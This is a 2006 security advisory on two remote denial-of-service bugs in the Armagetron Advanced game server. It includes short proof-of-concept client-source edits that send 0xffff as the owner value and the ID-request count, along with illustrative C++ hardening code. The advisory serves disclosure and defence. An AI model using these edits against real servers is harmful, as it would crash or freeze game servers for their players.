#######################################################################

                             Luigi Auriemma

Application:  Armagetron Advanced
              http://armagetronad.net
Versions:     <= 2.8.2 and current SVN
Platforms:    Windows, *nix, *BSD, Mac and more
Bugs:         A] crash through an invalid owner value
              B] freeze through invalid num in id_req_handler
Exploitation: remote, versus server
Date:         16 Jul 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Armagetron Advanced is a well-known action game inspired by the famous
Tron movie.


#######################################################################

=======
2) Bugs
=======

---------------------------------------
A] crash through an invalid owner value
---------------------------------------

The server terminates (or crashes) when a client sends an owner value
greater than MAXCLIENTS+1.
The function that reads this value is the following constructor, located
in network/nNetObject.cpp:

nNetObject::nNetObject(nMessage &m):lastSyncID_(m.MessageIDBig()),refCtr_(0)

If the value is not excessively big, the server terminates with the
following assertion failure:

Internal Error: Internal error in static nMachine& nMachine::GetMachine
(short unsigned int) in network/nNetwork.cpp:3820 : Assertion userID <=
MAXCLIENTS+1 failed
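The assertion above is a debugging aid, not input validation: a hostile
client reaches it with a single message and takes the whole server down.
The following is an added example, not Armagetron's code, of the shape the
check should take: the owner read from the wire is range-checked against
the same bound the assertion names, and an out-of-range value rejects the
message instead of aborting the process. MAXCLIENTS, the Message and
NetObject types and the function names are assumptions for illustration.

```cpp
#include <cstdint>
#include <optional>
#include <vector>

// Assumed limit for this example; in the real game MAXCLIENTS is a
// compile-time constant of the network layer.
constexpr uint16_t MAXCLIENTS = 16;

// Valid machine slots, exactly the range the failing assertion names:
// 0 .. MAXCLIENTS+1.
inline bool valid_user_id(uint16_t id) { return id <= MAXCLIENTS + 1; }

// Minimal stand-in for a received message: 16-bit words read in order,
// the way the create message carries the object id followed by the owner.
struct Message {
    std::vector<uint16_t> words;
    size_t pos = 0;
    std::optional<uint16_t> read() {
        if (pos >= words.size()) return std::nullopt;
        return words[pos++];
    }
};

struct NetObject {
    uint16_t id;
    uint16_t owner;
};

// Hardened construction (hypothetical): the owner is validated before
// anything indexes the machine table with it. A truncated message or an
// out-of-range owner returns nullopt, so the caller can drop the message
// (or disconnect the sender) and the server keeps running.
std::optional<NetObject> create_from_message(Message& m) {
    auto id = m.read();
    auto owner = m.read();
    if (!id || !owner) return std::nullopt;           // truncated message
    if (!valid_user_id(*owner)) return std::nullopt;  // hostile owner value
    return NetObject{*id, *owner};
}
```

With this shape the 0xffff owner from the proof of concept in section 3 is
refused at the parsing step, and the assertion in nMachine::GetMachine is
never reached with untrusted data.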


-----------------------------------------------
B] freeze through invalid num in id_req_handler
-----------------------------------------------

A client can freeze the server by sending a big num value (such as 0x7fff
or 0xffff) to the id_req_handler function used by the server in
network/nNetObject.cpp.
The server freezes and stays frozen with the CPU at 100%.
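The num field is a client-controlled count that drives a server-side
loop, so it needs an upper bound of its own, and the loop must stop when
the ID pool runs dry rather than keep searching. The following is an added
example, not Armagetron's code, of a bounded id_req handler: the
requested count is clamped to a per-request maximum and the allocator
reports exhaustion instead of spinning. ID_PREFETCH, MAX_IDS_PER_REQ, the
pool size and the function names are assumptions for illustration.

```cpp
#include <cstdint>
#include <optional>
#include <vector>

constexpr uint16_t ID_PREFETCH     = 50;               // assumed value
constexpr uint16_t MAX_IDS_PER_REQ = ID_PREFETCH * 2;  // assumed cap
constexpr size_t   ID_POOL         = 1024;             // assumed pool size

// Hypothetical free-list of object ids.
struct IdPool {
    std::vector<char> used = std::vector<char>(ID_POOL, 0);
    size_t cursor = 0;

    // Returns the next free id, or nullopt once the pool is exhausted.
    // An allocator that instead keeps scanning until it finds a free slot
    // is exactly the shape that pins a CPU at 100% when none is left.
    std::optional<uint16_t> next_free() {
        for (size_t i = 0; i < ID_POOL; ++i) {
            size_t c = (cursor + i) % ID_POOL;
            if (!used[c]) {
                used[c] = 1;
                cursor = c + 1;
                return static_cast<uint16_t>(c);
            }
        }
        return std::nullopt;
    }
};

// Bounded id_req handling (hypothetical): num is the client-supplied
// count. It is clamped before the loop starts, and the loop ends early
// when the pool is empty, so 0xffff costs at most MAX_IDS_PER_REQ steps.
std::vector<uint16_t> handle_id_req(IdPool& pool, uint16_t num) {
    if (num == 0) num = 1;
    if (num > MAX_IDS_PER_REQ) num = MAX_IDS_PER_REQ;
    std::vector<uint16_t> granted;
    for (uint16_t i = 0; i < num; ++i) {
        auto id = pool.next_free();
        if (!id) break;          // exhausted: stop, do not spin
        granted.push_back(*id);
    }
    return granted;
}
```

A request of 0xffff is thus served as a request of MAX_IDS_PER_REQ, and a
client that repeats it only drains the pool, which is a resource issue the
server can detect and rate-limit rather than an unconditional hang.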


#######################################################################

===========
3) The Code
===========


A]
Add a custom owner value in WriteCreate in network/nNetObject.cpp, so the
client sends 0xffff in place of its real owner ID:

void nNetObject::WriteCreate(nMessage &m){
    m.Write(id);
//    m.Write(owner);
    m.Write(0xffff);


B]
Add a custom num value in first_fill_ids in network/nNetObject.cpp, so the
client requests 0xffff IDs instead of ID_PREFETCH - 10:

    tJUST_CONTROLLED_PTR< nMessage > m = new nMessage(id_req);
//    m->Write(ID_PREFETCH - 10);
    m->Write(0xffff);


#######################################################################

======
4) Fix
======


A patched version will be released soon.


#######################################################################